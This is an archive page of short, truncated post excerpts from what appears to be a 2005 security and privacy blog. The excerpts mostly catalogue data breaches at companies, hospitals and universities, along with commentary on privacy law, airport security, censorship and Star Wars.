Florida Hospitals, "40 pages" of medical histories, mis-dialed fax

ALTAMONTE SPRINGS, Fla. — The private medical information for hundreds of people ended up at a Seminole County airplane parts business. The information was about patients at Florida Hospital East and Florida Hospital Altamonte. It included hundreds of names, birth dates, social security numbers and medical diagnosis information. … The 40-page fax included appointment information […]

 

Stupid Privacy Invasion Fatigue

This morning, Liz sent me a pointer to “Pentagon Creating Student Database” in the Washington Post. I said “Not blogging it. I have stupid privacy invasion fatigue.” Apparently, I’m not alone. In “ID theft concerns grow, tools lacking,” Bob Sullivan of MSNBC reports: Among the report’s most interesting findings: only 14 percent of consumers who […]

 

China's Internet Blocking and Ethics

Rebecca MacKinnon has a post about US companies which are selling internet censorship technologies to China, “Confirmed: All Typepad blogs blocked in China:” It’s a complicated issue. We need greater scrutiny of U.S. tech companies in China by bloggers, journalists, human rights activists, and anybody who cares about free speech and corporate accountability. We need […]

 

Uncle Sam's Privacy Polices (TSA, SSA)

Daniel Solove has posts on “If It’s Against Your Privacy Policy, Just Change It” (Social Security Administration): This feeds distrust about the government’s law enforcement activities as well as makes people unsure that they are ever being given the complete story about what the government is doing with their personal data. And what good is […]

 

Trial By Fire

Tom Ptacek and Jeremy Rauch are offering a course on analyzing products, taking them from black boxes to open books. Cool! From the ad: This class offers a behind-the-scenes tour of the product evaluation process. Renowned security experts Jeremy Rauch and Thomas Ptacek offer a crash course on the most important aspects of validating – […]

 

Kaiser Permanente, 150 patients, $200,000 fine

Computerworld reports that “Kaiser Permanente division fined $200k for patient data breach:” The California Department of Managed Health Care (DMHC) has fined Kaiser Foundation Health Plan, a division of Kaiser Permanente, $200,000 for exposing the confidential health information of about 150 people. The DMHC said the information had been available on a publicly accessible Web […]

 

"Dear Mastercard,"

Effective May 1, 2005, any compromise of my data will result in a $50 liability for you, the card issuer, owed to me, the card holder. Cashing the payment check I sent you last month (which you did) shall constitute your acceptance of this agreement. Subsequent security breaches will compound the fee. I will spell […]

 

Small Bits of Privacy

CSO has a “Do it Yourself Disclosure.” Hey, you skimped on security, you might as well skimp on the PR. Wired News comes out in favor of a data protection and privacy law for the US in “Conress Must Deal with ID Theft.” The Financial Times has an article on [UK] “Regulator urges tougher laws […]

 

CardSystems and Choicepoint

Choicepoint, please call your trademark attorneys. You’re in danger of becoming a generic term for “massive security breach,” and a band-aid isn’t going to fix that. That was the lead (and about all I’d written) of a long post on Choicepoint and some bank breach. I think it was the New Jersey case. The point […]

 

CardSystems Cards Being Exploited

The Denver Channel reports that “Stolen Credit Card Data Now Being Sold On Internet:” CardSystems Solutions Inc. is admitting it made a huge mistake after some 40 million credit card accounts ended up in the wrong hands. Some of those account numbers are already being sold on a Russian Web site, and some consumers are […]

 

FDIC, 6,000 employee SSNs, "security failure"

Thousands of current and former employees at the Federal Deposit Insurance Corp. are being warned that their sensitive personal information was breached, leading to an unspecified number of fraud cases. In letters dated last Friday, the agency told roughly 6,000 people to be “vigilant over the next 12 to 24 months” in monitoring their financial […]

 

Why I Blog

Inspired in part by Daniel Solove’s “How Blogging Changed My Life,” in part by a number of emails I’ve just sent saying “Sorry, I’ve been heads down with product release,” and the contrasting reality that I’ve found energy to write twelve blog posts in that time, I thought I’d talk about the muses. I started […]

 

Spaceman Bicycle Flask Holster

Because no one’s ever said “Is that a hip flask in your bike shorts, or are you happy to see me?” Available from Aherne Cycles.

 

CardSystem Solutions, 40,000,000 CC, hacker

The New York Times (and probably everyone else) is reporting that “MasterCard Says 40 Million Files Are Put at Risk.” MasterCard said its investigation found that CardSystems, in violation of MasterCard’s rules, was storing cardholders’ account numbers and security codes on its computer systems. That information, MasterCard said, was supposed to be transferred to the […]

 

Thanks, but…

The Open Mind kindly writes: Adam Shostack who is in the computer security side of business always has informed and interesting news on the security vs privacy front. (Another great blog via Harry’s world of interesting links. ) If you read anything vaguely connected to security or privacy in the mainstream media, Adam has probably […]

 

More on North Korean Online Warfare

I wrote about this in “North Korean Hacking Story,” and more detail emerges from a mail (or perhaps its a website? Hard to tell.) Anyway, this was eventually forwarded to Dave Farber’s IP list, Anyway, Brooks Isoldi, edidor of Intellnet writes: North Korea has trained a small army of computer hackers whose capability is equal […]

 

Minnesota, 2,000 medical records, hacker

The Duluth News Tribue is carrying a story, “State’s Web systems bogged down:” [Monicq] Feider, [manager of the Health Professionals Services Program] disclosed the problem in a March 31 letter sent to nearly 2,000 health professionals. “The case management system database includes private and public information about you,” she wrote. “The security company believes that […]

 

On Real ID, and Hearings

Privacy Law has a post, “Senate to Hold Security Breach and ID Theft Hearings” about a June 16 2005, Senate Committee on Commerce, Science and Transportation hearing on identity theft. The DailyBulletin editorializes against the Real ID act, “

 

Motorola, 34,000 Employee SSNs, Outsourcer ACS

In an article titled “Stolen PCs contain Motorola HR data“, Reuters is reporting that: In the latest example of hardware theft putting data security at risk, two computers containing personal information on Motorola employees were stolen from the mobile phone maker’s human resources services provider, Affiliated Computer Services (ACS). The data on the stolen computers […]

 

Star Wars Posts

Lileks bleats: When you switch to the Dark Side, do you have to go to Sith HR to fill a bunch of forms? If the Jedi Council finds out you’re looking to switch sides, they send guards to make you empty out your desk and escort you out – or at least they used to. […]

 

More Terrorist Slander Against Heroic Prison Guards

Except this time, the “terrorists” are American veterans working for a private company in Iraq: “I never in my career have treated anybody so inhumane,” one of the contractors, Rick Blanchard, a former Florida state trooper, wrote in an email quoted in the Los Angeles Times. “They treated us like insurgents, roughed us up, took […]

 

Small Bits: Soviet Realism at DHS and in China, Going Public, Lameness, and Curves

Artiloop reports on a security poster on the Marc commuter trains. Its clearly the work of a thoughtcriminal, encouraging ironic responses. I want to heroically help plan the tractor factory. I’ve been meaning to discuss the Chinese blog crackdown, but instead I’ll just juxtapose it with Soviet Realism. The Supreme Court of Canada has ruled […]

 

Emerging From Chaos

The server that Emergent Chaos lives on is at Server Beach, who have had serious problems with power. If you saw the Most Significant Bit home page, that’s Dwight Ernest, who kindly provides the space for me. Thanks Dwight!

 

The Open Society Paradox: Companies Have Privacy, You Don't

For those who, during the ChoicePoint outcry, (see Secondary Screening) were critical of me for not supporting a notification law for companies who maintain databases of personal information I point you to a couple of facts. First, today’s news that tapes with the sensitive data of 4 million Americans are missing is just the latest […]

 

ACM Computer & Communications Security

Industry and Government Track of CCS ’05 is now accepting submissions: The track aims to foster tighter interplay between the demands of real-world security systems and the efforts of the research community. Audience members would like to learn about pressing security vulnerabilities and deficiencies in existing products and Internet-facing systems, and how these should motivate […]

 

Teland and Wattal on Insecurity and Stock Price

At the Workshop on Information Security Economics, Rahul Telang and Sunil Wattal presented “Impact of Software Vulnerability Announcements on the Market Value of Software Vendors – an Empirical Investigation.” I’m pretty busy, so I’ll point to comments by Ed Moyle, and hefty analysis by Tom Ptacek. [Private to DM: If I say its a workship, […]

 

"Well, umm, He Had Valid ID"

AP is reporting “Man With Chain Saw, Sword Is Let Into U.S.:” On April 25, Gregory Despres arrived at the U.S.-Canadian border crossing at Calais, Maine, carrying a homemade sword, a hatchet, a knife, brass knuckles and a chain saw stained with what appeared to be blood. U.S. customs agents confiscated the weapons and fingerprinted […]

 

Markets in Social Security Numbers

Social security numbers used to be just for social security. But the government is the only actor in the marketplace who can produce something, and also mandate demand for it. In the case of SSNs, they’ve created a large demand by declaring that Uncle Sam gets to decide who you may hire. (The gossip-mongers credit […]

 

Terminal Futility

I think I had also noticed that there are not enough plastic bins or tables to line them up on, and that “X-ray machines that examine carry-on baggage sit idle as much as 30 per cent of the time.” The time elapsed between Sept. 11, 2001, and today’s writing (1,364 days) is only slightly less […]

 

Madison, The Bill of Rights, Raich

The Supreme Court today handed down a decision in “Gonzales vs. Raich.” Larry Solum has done outstanding work blogging it. The essence of the case was the limits of the commerce clause, and the case was decided that the commerce clause places, essentially, no limits on what Congress may legislate. Respondents nonetheless insist that the […]

 

Citibank, 3,900,000 SSNs, unencrypted tape

[Update: Bruce Schneier has an important update in “E-Hijacking.” Thanks to Chris for pointing this out.] CNN is reporting that Info on 3.9M Citigroup customers lost. Citigroup said Monday that personal information on 3.9 million consumer lending customers of its CitiFinancial subsidiary was lost by UPS while in transit to a credit bureau — the […]

 

Polk Community College, 3 SSNs, Professor Bradley Neil Slosberg

Professor Bradley Neil Slosberg asked students in his anatomy and physiology class to sign in with their name and social security numbers. They did. CNN quotes student Amanda Bracewell: “We all signed it. We figured, ‘He’s a teacher, what is he going to do with it?’” TBO.com news has the only non-AP story, at Professor […]

 

New Law Protects You, Shredder Makers

At MSNBC, Bob Sullivan reports “Got a nanny? You need a shredder:” Even if you ordered a background check on your kid’s coach, or nanny, or — as is the latest trend in online dating — on a prospective blind date, the law applies to you. Transgressions — such as tossing paperwork containing personal information […]

 

Cakeeater on Tiananmen

CakeEater has a beautiful post on the man in front of the tanks: Then the tank tried to get around him. And he moved in concert with it, shifting to stay directly in its path. I remember being stunned when this happened. I remember saying, “Holy Shit!” to no one in particular in the family […]

 

Duke, 9,000 partial SSNs, Hacker. (With Commentary.)

In Hacker hits Duke system, the (Charlotte? Raleigh [thanks, Neil!]) News and Observer reports on a breach at Duke University School of Medicine. The school’s “Security Incident at Duke” page states: On Thursday, May 26, 2005 a security breach allowed an unauthorized user to gain access to data stored on several web sites at Duke […]

 

Moxie CrimeFighter Jillette

Its all over the web that Penn Jillette and his wife Emily have named their new baby Moxie CrimeFighter. I’m sorta disappointed that they didn’t go all the way, and name her “Moxie CrimeFighter™ Jillette, a member of the Jillette family of people.”

 

Breach Laws

The Washington Post reports: States Keep Watchful Eye on Personal-Data Firms: Critics of the multi-state approach say that due to the potential monetary, logistical and public-relations headaches that could come from establishing different requirements and penalties in each state, companies will soon be forced to set their overall policies to satisfy the state with the […]

 

The Voting-Industrial Complex

The fine folks over at Black Box Voting demonstrate that Diebold can’t even build an optical scan voting machine without screwing it up in “Optical scan system hacked (3 ways).” If we existed in a reality-driven world, these people would be permanently disqualified from participating in the vote counting process. Vote counting is, as Stalin […]

 

June 4th, 1989

At our best, the United States inspires people around the world to reach for freedom and democracy. In the student led rallies in Tiananmen Square, the students built a statue of liberty as one of the centerpieces of their protest. I remember watching the protests on TV, being thrilled by the power of people to […]

 

North Korean Hacking Story

The Korea Herald has done an awful job of reporting in “N.K. hacking ability matches that of CIA, analyst says.” Normally, I ignore awful reporting as roughly par for the course, but this is egregious. “Our electronic warfare simulation indicates that North Korea’s capability has reached a substantial level, unlike what is generally known to […]

 

Small Bits: Wives Vs. The Dark Side, Diamonds, FRCA, Brill & Lexis-Nexis

VikingZen posts her Two Cents about Revenge of The Sith, and closes with: My big question: Why didn’t Padme just release a can of whoop-ass on her husband? I mean, they’re secretly married, the guy’s off in some outer galaxy playing space cowboy while she’s lugging around a pregnant belly full of twins? How about […]

 

More on Deep Throat

The Telegraph has a roundup story, “FBI Deep Throat branded a traitor by Nixon aides:” Charles Colson, Nixon’s chief counsel who served seven months in jail for his role in the Watergate scandal, confessed to understanding the dilemma Mr Felt faced. But he added: “When any president has to worry whether the deputy director of […]

 

University of Cincinnati, 7,000 SSN, Hacker

Cincinnati’s Channel Cincinnati reports that “Hacker Steals Personal Data From UC System:” UC Vice President of Information Technology, Fred Siff, said the hacker knew how to avoid intruder alerts on the system. “This was obviously a serious breach,” Siff said. “This is a very sophisticated hack. I hope that goes without question. It wasn’t just […]

 

Omega World Travel, 80,000 CCs, Laptop

The Washington Post reports, “FBI Probes Theft of Justice Dept. Data” The FBI is investigating the theft of a laptop computer containing travel account information for as many as 80,000 Justice Department employees, but it is unclear how much personal data are at risk of falling into the wrong hands. Authorities think the computer was […]

 

SEC on Internal Controls

Pete Spire Lindstrom* points to a press release from the SEC on “Commission Statement on Implementation of Internal Control Reporting Requirements:” “Registered public accounting firms should recognize that there is a zone of reasonable conduct by companies that should be recognized as acceptable in the implementation of Section 404.” “A one-size fits all, bottom-up, check-the-box […]

 

Reporters without…Mathematics

DM pointed me to this Register story, “Fraud expert becomes victim of credit card crime.” Its a nice bit of irony, but my favorite bit is the very end: CNP (Cardholder Not Present) fraud in the UK has grown nearly 50 times between 1994 and 2003 to £116.4 million. Goodwill wants the government to recognise […]

 

W. Mark Felt aka Deep Throat

For more than 30 years, W. Mark Felt, and three co-conspirators have protected his privacy after one of the most spectacular whistleblowing act in history. He’s admitted to being Deep Throat in this Vanity Fair article. The Washington Post has coverage in “FBI’s No. 2 Was ‘Deep Throat’“, and “Conflicted and Mum For Decades.” I’ve […]

 

Breach Disclosure Laws

The National Conference of State Legislatures has a “2005 Breach of Information Legislation” summary page: Summary: Legislation was introduced in at least 34 states as of May 18, 2005. Legislation enacted in at least six states in 2005: Arkansas, Georgia, Indiana, Montana, North Dakota and Washington. Thank you, masked man Choicepoint. (Via The HIPAA blog.)

 

Bluetooth vs Infrared

John Early has an interesting editorial over at Computer Weekly “Infrared meets speed and security needs:” Famously associated with applications such as personal digital assistant to laptop synchronisation, PDA business card exchange and short-haul mobile phone data transfer; IRDA, with its short range and relatively low 4mbps throughput, was understandably discounted by the IT community […]

 

Choicepoint Roundup

Household Watch has a story: When Ms. Marshall got a $6,000 home-improvement loan from a credit union in April 2003, she had to pay relatively high interest because of a weak credit score. The credit check had showed a court ruling ordering her to pay overdue rent to a former landlord in a Washington, D.C., […]

 

Choicepoint vs CIA

The New York Times has a long article on the successors to Air America, “C.I.A. Expanding Terror Battle Under Guise of Charter Flights.” The bit that really caught my attention was: On closer examination, however, it becomes clear that those companies appear to have no premises, only post office boxes or addresses in care of […]

 

The FBI Goes Undercover

The New York Times is reporting on a number of undercover investigations that have lead to charges against people accused of helping or trying to help terrorists. in “Trying to Thwart Possible Terrorists Quickly, F.B.I. Agents Are Often Playing Them.” The use of undercover agents is an excellent move by the FBI, and should be […]

 

Privacy and Courage

I met Hossein Derakhshan at Blognashville. He and I respectfully disagree about the value of privacy to bloggers in oppressive regimes. He points out (correctly) that a blogger who has the courage to use his or her own name gains credibility. While I don’t disagree, I think there are people out there who don’t blog […]

 

Speaking of Usability: Privacy and Openness

Jon Mills, who has been heading up Florida’s Committee on Privacy and Court Records. He has an article in the HeraldTribune: How do we balance the competing values of privacy and openness? The Internet makes possible greater openness, so indispensable to good government, and allows for greater convenience in accessing government services, including court records. […]

 

Usability Testing

Nat Friedman has a good post on usability testing: Over the last several months we at Novell have sent a team of people around the world with a portable usability testing lab… It is amazing to watch the ways that people fall on their face. We’ve all read about the benefits of usability testing, but […]

 

"Non"

The French have apparently rejected the EU Constitution. With 83% of the votes counted, it’s 57% Non, according to ABC news. The draft constitution was, from my perspective, the worst of the new Europe: Opaque, complex and undemocratic. We can hope that new blood in the EU will press for a simpler, more transparent, and […]

 

French Elections

You might not know it if you read only the American press, but the French voted today in a referendum on the European Union’s proposed Constitution. It’s an awful document, and the French are expected to reject it, plunging the EU into crisis, and leading to the Chancellor being made Emperor. If the EU would […]

 

Social Security

I try to stay out of debates that have devolved into the red and blue halves of the Demopublican party screaming soundbites at each other. The party hopes that the American people won’t notice that they’re the same if they yell and scream a lot, and I try not to play their game. C. Eugene […]

 

Only Two Cheers for the Jedi?

Bryan Caplan takes issue with his mentor, Tyler Cowen over “The public choice economics of Star Wars: A Straussian reading. (I also commented on that post). Caplan says: After Anakin’s betrayal, the remnant of surviving Jedi reveal their “secret and mysterious ends.” They turn out to be neither secret nor mysterious. Yoda and Obi-wan take […]

 

My Navel, it is Fascinating!

I’ve played with the stylesheet for the web version of the blog, added an individual-i logo, removed the calendar and put the search bits in what seems like a more rational order. Some other general tweaks, too, in the hopes of making the web version aesthetically pleasing. I knew you’d be thrilled. [Update: fixed link. […]

 

Sport Utility Bike?

[The] Freeradical S.U.B conversion kit … makes your favorite ride into the baddest sport utility bike on the planet. Forget pantiers and racks on the front, or over the back tire that bump your knees and feet. Rather than relying on the strength of a single peg or gimbal on a bike trailer, the Freeradical […]

 

Small Bits: Xrays, Free Speech, Law, Cowards and Crypto School

Justin Mason has a good post on the new backscatter radiation xray machines that TSA would like to deploy. My favorite part: They create child pornography. Interestingly, these are one of the relatively few places that a privacy invasion makes us safer. Also interesting is that different people perceive either the hand-pat or the naked […]

 

Purdue University, 11,360 SSNs, hacker

Purdue University is alerting current and former employees that their Social Security numbers and other information may have been illegally accessed from at least one of four campus computer workstations. “Our investigation of a recent information technology security breach shows that the records of 11,360 current and former employees may have been accessed electronically,” said […]

 

University of Chicago, 24,000+ SSNs, Unsecured File server

The action is motivated by the discovery by a campus web developer that files containing social security numbers were located on a portion of a public server that could be accessed by web developers not associated with the site. He had pointed this out last November, at which time all of the several dozen files […]

 

Those Who Forget History

Some folks calling themselves “American Rhetoric” have put up a page entitled “Top 100 Speeches.” On further examination of the site, it’s the 100 most significant American political speeches of the 20th century, according to a list compiled by Professors Stephen E. Lucas and Martin J. Medhurst. Dr. Lucas is Evjue-Bascom Professor in the Humanities […]

 

MoneyBall

Over at “Statistical Modelling,” Sam discusses “Sabermetricians vs. Gut-metricians:” There’s a little debate going on in baseball right now about whether decisions should be made using statistics (a sabermetrician is a person who studies baseball statistics) or instincts. Two books are widely considered illustrative of the two sides of the debate. Moneyball, by Michael Lewis, […]

 

Small Bits of Chaos: Continuity, Texas, Stealth Bomber

Todd Seavey has a well-written and entertaining long article on continuity in long series. I’ll leave the continuity error as an exercise for readers. In fact, so many necessary plot details of Episode III are already known that the ticket-selling site Moviefone.com already has a lengthy summary of the film on its site, as if […]

 
 

Small Bits of Chaos: Hal Stern, Lexis-Nexis Hackers, UK ID Cards, Bolton

Hal Stern has a blog! Hi, Hal! Wired News has a long story, “Database Hackers Reveal Tactics,” about the kids who broke into Lexis-Nexis. There’s some interesting bits. Most interesting to me is that none of these kids seem to have lawyers telling them to shut up. The BBC has an article on British reactions […]

 

Valdosta State University (Georgia) , 40,000 SSNs, hacker

The Associated Press reports “Identity theft risk widens at Valdosta State:” VALDOSTA — A computer identity breach at Valdosta State University has widened, with authorities now saying up to 40,000 people could have had their Social Security numbers accessed by a computer hacker last week. The breach was larger than originally thought, said school spokesman […]

 

676,000 Victims

I first covered the improper disclosures by Wachovia, Bank of America, Commerce Bancorp, and PNC Bank NA employees last week. It’s now up to 676,000 accounts, all New Jersey residents. The Census Bureau estimates that in 2003, New Jersey had 8,638,396 residents. Thus, around 8% of the people of New Jersey are affected by Orazio […]

 

Stanford, 9,900 SSNs, Insecure Career Center computer

The San Jose Mercury News reports that “Computer system hacked at Stanford:” The FBI and Stanford University are investigating how someone hacked into a computer system containing information about people looking for work through the university’s Career Development Center. University spokesman Jack Hubbard said there was no evidence that any data had actually been acquired […]

 

Don't Be So Proud Of This Technological Terror You've Created

The New York Times reports on the “Customs-Trade Partnership Against Terrorism” in “U.S. Effort to Secure Foreign Ports Is Faulted:” The Department of Homeland Security’s effort to extend its antiterrorism campaign overseas by enlisting help from importers and foreign ports has been so flawed that the program may have made it easier at times to […]

 

Global Internet Freedom Act in House

… SEC. 5. SENSE OF CONGRESS. It is the sense of Congress that the United States should… (3) deploy, at the earliest practicable date, technologies aimed at defeating state-sponsored and state-directed Internet jamming by repressive foreign governments and the intimidation and persecution by such governments of their citizens who use the Internet. Rebecca MacKinnon has […]

 

Breaches List at Privacy Rights Clearing House

The Privacy Rights Clearinghouse have been tracking breaches too. They’ve tallied 5,476,150 people affected, and have a better list than I do. I’ll continue to cover as I see things, since their list isn’t complete either.

 

I Could Kill You With These Nose Hair Clippers!

Like I said, I do like rules, rules that make sense. But this is a form of institutional insanity, and someone needs to do an intervention. When a soldier in full uniform, in the company of nothing but other soldiers, is allowed to retain the bayonet for his M-16 and his M-16, yet has to […]

 

Two On Secure Software

There’s a placeholder page at NIST for their SAMATE project, (“Software Assurance Metrics and Tool Evaluation”). Interesting stuff if you wonder why its so hard to release secure software. Also, Lauri@Schedler writes, in Making correct code look good Reading the article I was wondering what is the point of leaving information about safe and unsafe […]

 

New Books

Two new books that may be of interest are blogger Wendy McElroy’s “National Identification Systems, Essays in Opposition” and Choicepoint CISO Richard Baich’s “Winning as a CISO.” I was going to add clever text juxtaposing the texts, but really. hmmm, I really must make this post longer, or the blog looks really bad.     […]

 

Jackson (Mich) Community College, 8,000 SSNs, Bad Policy

The Detroit Free Press reports that “Hacker may have stolen Social Security numbers from Jackson Community College:” A hacker who broke into the computer system at Jackson Community College may have accessed as many as 8,000 Social Security numbers, the college said Monday. The hacker broke into the system Wednesday. College officials are still investigating […]

 

MCI, 16,500 employees, ironically anonymous employee

Reuters is reporting “MCI: employee data was on stolen laptop:” A laptop computer containing the names and Social Security numbers of about 16,500 current and former employees of MCI Inc. was stolen last month, the Wall Street Journal reported on Monday. The computer was stolen from a car that was parked in the garage at […]

 

Emergent Bits of Security: Analyzing Binaries, Code

If you think that an application is more secure because it’s undocumented, you should read Salman A. Baset and Henning Schulzrinne’s “An Analysis of the Skype Peer-to-Peer Internet Telephony Protocol.” (Thanks, DM) Network Computing also discusses the idea, in the context of How Dangerous Was The Cisco Code Theft?. Gunnar Peterson mentions a Richard Clark […]

 

The Altered Deal

In “…And Another Thing: Those Jedi Children Were a Threat,” Gene Healy refers to the Weekly Standard review of Attack of the Clones, with its famous defense of the Empire. Make no mistake, as emperor, Palpatine is a dictator–but a relatively benign one, like Pinochet. It’s a dictatorship people can do business with. They collect […]

 

Adopt a Chinese Blog

To help folks in places like China blog, there’s the obvious problems of protecting their privacy against the local authorities. But often, the audience that a blogger seeks is not the international, but the local. A blogger in China should be able to write in Chinese and share their thoughts with the people around them. […]

 

Housing Bubble?

Kip Esquire discusses “Housing Bubble: The Non-Lessons of the Past:” Today, we get some unhelpful noise from TCS Overlord James “Always Wrong” Glassman. (Remember “Dow 36,000”? The only thing dumber than the book was his half-hearted non-apology for it.) Now he’s fanning the flames of “What, us worry?” for the housing market: Since 1950, according […]

 

More on Bridge Blogging

Recently, I discussed bridge bloggers, folks who make an effort to make their posts comprehensible to those outside their country. In that post I mentioned a few information security bridge bloggers; folks who try to make our profession understandable to those outside. Something that I wanted to mention, if only it had fit into an […]

 

About Episodes 7, 8 and 9

Stuart Berman reminded me of the original plan, which was a 9-episode epic cycle for Star Wars. At some point, Lucas made the decision to allow others, the novelists, the game creators, and even the fans to define what happens after Return of the Jedi. It was a brilliant choice. The original Star Wars was […]

 

Darth Vader Doesn't Use a Keyboard

But if he did, he’d be all over the new Das Keyboard, in pure modernist black, without any decoration, like letters printed on the keys. Because sometimes you just need to signal that you’re so…ummm….cool…that you don’t need letters on the keys. (Via Daring Fireball, who points out that it’s “marketed to “übergeeks” who might […]

 

Arrests in T-Mobile, Lexis-Nexis

The Washington Post reports on Computers Seized in Data-Theft Probe: According to the teenage source, a police officer in Florida was among those who opened the infected e-mail message. Not long after his computer was infected with the keystroke-capturing virus, the officer logged on to his police department’s account at Accurint, a LexisNexis service provided […]

 

Alien Spacecraft Captured…in Orbit Around Mars

NASA’s Mars Odyssey spacecraft appears twice in the same frame in this image from the Mars Orbiter Camera aboard NASA’s Mars Global Surveyor. The camera’s successful imaging of Odyssey and of the European Space Agency’s Mars Express in April 2005 produced the first pictures of any spacecraft orbiting a foreign planet taken by another spacecraft […]

 

Can We Talk Sith Yet?

I mean, really. If you mind spoilers, you’ve seen Revenge of The Sith already. Ok, maybe not. So I’ll just throw a few comments out. Marginal Revolution discusses The public choice economics of Star Wars: A Straussian reading. I’m surprised that Tyler misses the Hayekian aspect. That is, other people’s choices are so complex that […]

 
 

Emergent Bits: Iranian Blogger, Economics, Security myths

Iranian blogger Mojtaba Saminejad has declared a hunger strike to protest his imprisonment. The Committee to Protect Bloggers has asked that we observe a media fast next Thursday, May 26th and not blog. There are also email addresses to write to to ask that Mojtaba be released. Ethan Zuckerman has some fascinating comments on the […]

 

Choicepoint, Axciom Highly Accurate

100% of the eleven participants in the study discovered errors in background check reports provided by ChoicePoint. The majority of participants found errors in even the most basic biographical information: name, social security number, address and phone number (in 67% of Acxiom reports, 73% of ChoicePoint reports). Moreover, over 40% of participants did not receive […]

 

Real ID Roundup

The fair and balanced Real ID Sucks blog (“A clearinghouse of stories about how the states will be required to spend $250 million to create standardized, machine-readable driver’s licenses, to make it easier for hackers, thieves and credit bureaus to track your every move.”) points to a San Jose Mercury News editorial, “Real ID Act […]

 

The Force Is Strong In This One.

I don’t know if it was better than A New Hope or The Empire Strikes Back. It was certainly better than I or II by a long margin. More on the politics after I’ve seen it several more times, and perhaps slept.

 

This Will Be A Day Long Remembered

It has become cliche to go on about how Greedo shooting first nearly destroyed Episode IV. For characters not to mature and grow through the course of Star Wars makes it just an action flick. But what makes Star Wars truly great is the conflict within Anakin Skywalker. And tonight’s episode is all about Anakin. […]

 

Emergent Bits of Security

(Updated shortly after posting with Eric Rescorla’s evidence presentation.) Nick Owen has a post about Net Present Value and Annual Average Loss Expectancy. If you think security is all about vulns and 0day, you probably don’t need to read this post, and your boss is going to keep rejecting your spending proposals. Carrie Kirby argues […]

 

Private to CIBC: That wasn't a challenge

Last month, I asked “What Do You Need To Do To Get Fined?” in reference to CIBC’s improper disclosure issues. Now the Ottawa Citizen is reporting that “Bank springs another privacy leak:” Fresh off fax blunders that earned it a rebuke from the federal privacy commissioner, the Canadian Imperial Bank of Commerce admitted yesterday that […]

 

Welcome to the 21st Century

Only 14 years after they were liberated by American-led forces, our ally Kuwait…gives women the vote. The Chicago Tribune reports: KUWAIT CITY — Parliament extended political rights to Kuwaiti women Monday, but religious fundamentalists who opposed women’s suffrage succeeded in attaching a clause requiring future female politicians and voters to abide by Islamic law. The […]

 

About Those Insiders, Again

Way back in August, I mentioned the CERT/CC collaboration with the Secret Service in analyzing insider threats. They’ve just released a second report, “Computer System Sabotage in Critical Infrastructure Sectors” (163k PDF). I haven’t had a chance to read it, but that’s no reason not to blog about it. Tip of the hat to Dan […]

 

Choicepoint

Knight Errant has a long post, “Tipping My Tinfoil Hat,” in which he makes mention of Choicepoint. And Consumer Affairs has a long article “USA PATRIOT Act Rewards ChoicePoint.” The IntegraSys corporation’s ID Verification software, for example, cross-checks and references 23 billion data records, including everything from credit report headers to “warm address lists” that […]

 

Emergent Privacy Bits

TechDirt points to a Cnet story by Declan McCullagh, “Kiss your old SSN goodbye:” Rep. Joe Barton, another Texas Republican who happens to chair the House Energy and Commerce Committee, said last week that he plans to “outlaw the use of Social Security numbers for any purposes other than government purposes.” … “The time has […]

 

San Jose Medical Group, 185,000, Joseph Nathaniel Harris (update)

Joseph Nathaniel Harris has been arrested and charged with the April break-in to the San Jose Medical Group, and stealing two computers with 185,000 medical records on them. The San Francisco Chronicle reports: “During Harris’ employment at San Jose Medical Group, there were several incidents of reported theft of money and medications,” according to an […]

 

Merlin Information Systems, 9,000, Lying customers

If these data brokers had any ability to deliver on their marketing, these things would never happen. Some assistant DA somewhere is going to close a data broker on false advertising, and make a name for themselves. The Daily Interlake reports “Thief nets personal information from Kalispell company:” About 9,000 people have been notified that […]

 

Hinsdale Central High School (Chicago), unknown #, 2 students

ABC7Chicago reports “Two students investigated for identity theft at high schoo” May 12, 2005 — Criminal charges might be filed against two students for stealing personal information at a west suburban high school. The students at Hinsdale Central are accused of hacking into the school’s computer system and obtaining Social Security numbers for students and […]

 

Michigan State Wharton Center, 40,000 CCs, Hacker

The Detroit Free Press reports “Michigan State’s Wharton Center says computer security breached:” EAST LANSING, Mich. (AP) — Michigan State University has warned more than 40,000 Wharton Center patrons that a hacker broke into a computer server involved in credit card processing for the performing arts venue. But so far, there has been no indication […]

 

Primary Colors, Author Unknown

In discussing private blogging at Blognashville, the idea of identifying bloggers by their writing style kept coming up. The example that was used (at least) twice was the “computerized” identification of the anonymous author of Primary Colors. The trouble is, the identification wasn’t done by computer. It was done by Vassar English Professor Don Foster. […]

 

Georgia DMV, employee Asif Siddiqui, "hundreds of thousands"

The Atlanta Journal Constitution reports Georgia driver’s license data put at risk (Use Bugmenot if you need a login.): Georgia Technology Authority said Friday that Asif Siddiqui, a 43-year-old Pakistani who worked for GTA, could have downloaded information on “hundreds of thousands” of drivers before he was arrested and fired late last month. … The […]

 

20Q: Emergent Databases

20Q is a website and now a handheld electronic toy that plays 20 questions. But the web site doesn’t just play 20 questions, it learns as it goes. It decides which questions are good, and which questions are bad. Alex Tabarrok writes on Marginal Revolution: I was skeptical when my wife handed me a small […]

 

The Strange Case of Syed Maswood

A year after federal agents raided his home in a terrorism investigation, Muslim businessman Syed Maswood is lucky to get on an airplane without being detained and searched. But that didn’t stop him from getting an invitation to dine with U.S. President George W. Bush. Maswood, a nuclear engineer who has not been charged with […]

 

Small Bits of Chaos: Airports, Junk Mail and Employment Law (Context-free)

Scared Monkeys asks “Could Iris Scanning be Coming To an Airport Near You?” (As if the TSA hadn’t wasted enough money on machines that don’t work, or seizing zippo lighter cameras.) Maybe the camera in their iris scanner was busted? New blog “The Dunning Letter” claims to be from a long-time junk mailer, now repentant. […]

 

Safari Enhancers

I’ve mentioned using PithHelmet. One of the most annoying remaining behaviors in Safari is that the close button closes all your tabs, and its very close to the minimize button. D’oh! Holy usability errors without a warning batman! Taboo comes to the rescue, adding that warning. (While I’m blathering about my web browser, let me […]

 

The Right to Self-Treatment

The Mutualist Blog has a great article on how and why the right to choose your own medical treatments was removed, and what that means to you.

 

Choicepoint, May 12

Law.com has an article “Lawyers See Data ‘Fear Factor’ Rising:” The suits, which have been consolidated in federal court in Los Angeles and are requesting class action status, seek monetary, statutory and punitive damages, including compensation for the anxiety of waiting and wondering. They also aim to represent consumers regardless of whether their data were […]

 

Undertow of Totalism

Orcinus has a great, long post on “Undertow Of Totalism.” He starts with Two Minutes Hate, and goes from there. Read it, and then ask yourself, does your blood boil when someone mentions Ann Coulter? Michael Moore? If it’s one or the other, ask yourself if you’re being played, and stop. Pay no attention. Participate […]

 

Sogreni Bicycle Trouser Clip

